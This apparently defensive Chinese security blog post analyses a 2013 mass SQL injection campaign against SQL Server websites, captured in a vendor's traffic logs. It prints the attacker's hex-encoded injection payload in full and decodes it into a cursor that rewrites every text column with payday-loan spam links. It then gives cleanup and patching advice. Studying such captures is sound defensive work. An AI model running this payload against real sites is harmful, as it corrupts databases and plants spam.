RSS Feed
更好更安全的互联网

工具党:东欧某贷款公司的攻击

2013-04-01

今天继续接着上篇《有一种黑客叫做工具党》(

http://mp.weixin.qq.com/mp/appmsg/show?__biz=MjM5NTUzMzMwMQ==&appmsgid=10000020&itemidx=1)来说说大数据黑客,本周某个晚上我再次被去重后10亿条社工数据与QQ钓鱼上亿条数据给震住了,其实不是这个数字震住了我,而是背后的关联分析,这基本是可以搞下任意目标。

类似黑客V这样能量的人应该有好些,只是各有各的创奇罢了,以前搞黑产的朋友,他们看了那些怀疑论者就笑了,不过还是别高调出来证明什么,这样的能力不需要证明。

在进入今天的话题之前,我特别说下:大数据黑客真正的牛逼不在于拥有那些大数据,而在于善于进行“关联分析”(或者我们常说的数据挖掘与分析)

来说下我们今天的故事。

我们有个云服务,估计很多朋友已经知道了:加速乐(www.jiasule.com),截止到现在已经正在服务36828个网站了,每天的请求累计至少2亿,这么海量的日志,是不是可以发现很多攻击行为?

我们历史上分析了很多很多有趣的点,这次分享一个出来,不算最精彩的,不过还是挺有趣的:)

3月某天下午,成都阴暗的天压得很低,行人匆匆,知道创宇成都分公司里还是和往常一样的喧闹,团队每天都和打战似的,加速乐团队的几个帅小伙,每人面前两个显示器,除了数据还是数据。lux在滚动的数据前,发现连续大量的异常请求,这些安全研究员对数据都有天生的敏感性,他发现一个来自俄罗斯IP(91.220.1xx.xxx)对中国大量网站发起的注入攻击,手段很赤裸,危害很直接。

这是一次经典的:Mass SQL Injection攻击(大规模SQL注入攻击,主要针对SQL Server)。

这样的攻击是通过工具自动化完成的,步骤大概是:

  1. 准备好攻击网站列表,这样的列表可以通过很多途径得到,最土的方式是自己写爬虫全球爬,然后可以考虑自动分类好;
  2. 工具调度起来,以这批列表为入口点,发起多进程、多线程(甚至集群、分布式)攻击;
  3. 攻击基本都带上同样的攻击代码(payload);
  4. 判断扫描成功状态,并记录;

这次的其中一个攻击代码如下:

'+declare+@s+varchar(8000)+set+@s=cast(0x73657420616e73695f7761726e696e6773206f6666204445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e5441424c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d412e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e4754483e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e7461626c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d5245504c414345285b272b40432b275d2c202727636f72797061796461796c6f616e732e636f6d27272c2027276d6178787061796461796c6f616e732e636f6d272729207768657265205b272b40432b275d206c696b6520272725636f72797061796461796c6f616e732e636f6d252727202729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(@s)--

解密后是:

set ansi_warnings off
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR select c.TABLE_NAME,c.COLUMN_NAME
   from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
   where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
   and c.CHARACTER_MAXIMUM_LENGTH>10
   and t.table_name=c.table_name
   and t.table_type='BASE TABLE'
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
   EXEC('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'], ''corypaydayloans.com'', ''maxxpaydayloans.com'') where ['+@C+'] like ''%corypaydayloans.com%'' ') 
   FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

这段SQL的行为会将目标数据表里的corypaydayloans.com替换为maxxpaydayloans.com,为何做这个动作?我们根据捕获到的日志前后关联分析了下,并Google Hack调查了一些被黑的网站,这个黑客团队的目的就是往目标网站的数据表里植入他们的广告链接(就像暗链),进行搜索引擎欺骗提升广告链接的排名。而这句SQL语句就是替换目标网站的广告链接(算是一次例行更新)。

这样的大规模攻击其实非常的暴力,很可能破坏目标网页的布局,如:

这样的破坏会很快引起站长的注意,不过对于大多数站长来说要清理就很痛苦了,因为这样的SQL注入是暴力的,且注入进去的值存在一些随机变量,我们发现很多站长在苦恼如何清除。我还没试过清除,就不乱提供方式了,不过思路可以提供下作为参考:

  1. 如果有数据库备份习惯的,简单的方式就是回滚;
  2. 可以使用SQL正则进行批量清除(改改上面那个SQL语句);

然后赶紧修补好网站的SQL注入漏洞(如果懒,可以免费注册加速乐进行一键防御),很多站长说自己辛苦清理完后又被植入了。

我们对这些注入的广告链接进行了调查,从whois信息发现全都来自同一人注册(国家:捷克),域名特征都包含(paydayloans.com)。前面说的攻击源IP(91.220.1xx.xxx)也提供了80服务,浏览器打开发现和这些注入的链接页面是一样的:

似乎是放高利贷的,提供贷款服务。

我们对这个贷款不感兴趣,感兴趣的是背后的黑客团队,由于业务繁忙,我们并没有进行更深入的追踪,比如搞下这个攻击源头服务器,不过,可以等我们的好消息:)

另外,这批黑客具体是哪的,是不是东欧的,目前都不关键了,通过表面的信息来做推测并不靠谱,靠谱的是拿下源头。

有这些工具党的存在,你的网站随时都可能躺枪,我们前段时间还捕获了一次利用DedeCMS nday的大规模挂马攻击,无数DedeCMS躺枪(包括iciba.com、funshion.com等大网站的一些子站),我们前几期的一篇文章《[黑产科普]最近大规模的QQ空间钓鱼攻击》里提到的大规模QQ空间钓鱼攻击,也是利用DedeCMS的漏洞……

回头看看这些工具党、大数据黑客,他们让我们置身于枪林弹雨的互联网,一个不小心就躺枪。只有摸清楚他们的行为,才能更有利于我们做出防御对策。今天的科普就到这,下篇来点轻松点的,先暂时告别这个了。

 

----------分割线----------

 

我们会持续性的进行安全科普,大家有什么问题可以在微信里给我们留言,我们会认真对待每份留言,并在下次发文时进行必要的解答。如果大家有什么安全八卦也欢迎投稿给我们,我们的微信:网站安全中心/wangzhan_anquan。

科普改变世界,我们一起努力让这个互联网更好更安全吧!

本文由知道创宇安全研究团队-余弦撰写。

请关注我们的官方微信:网站安全中心

作者:一鸣 燕 | Categories:技术分享 | Tags:

一条评论

  1. noname说道:

    自己写工具的工具党

发表评论